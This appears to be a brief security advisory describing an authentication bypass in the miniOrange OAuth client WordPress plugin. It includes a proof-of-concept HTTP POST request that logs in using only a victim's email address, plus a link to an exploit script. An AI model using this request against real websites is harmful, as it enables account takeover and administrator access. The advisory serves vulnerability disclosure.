The plugin was affected by an Auth Bypass vulnerability. To bypass authentication, we only need to know the user’s email address. Depending on whose email address we know, we may even be given an administrator role on the client’s website.
Proof of Concept
POST /vdb/miniorange-oauth-client/ HTTP/1.1 Host: lana.solutions Content-Type: application/x-www-form-urlencoded option=mooauth&[email protected]
Exploit script: https://gist.github.com/lana-codes/4ee8c5fc44f91e2e99ab1b215718cf71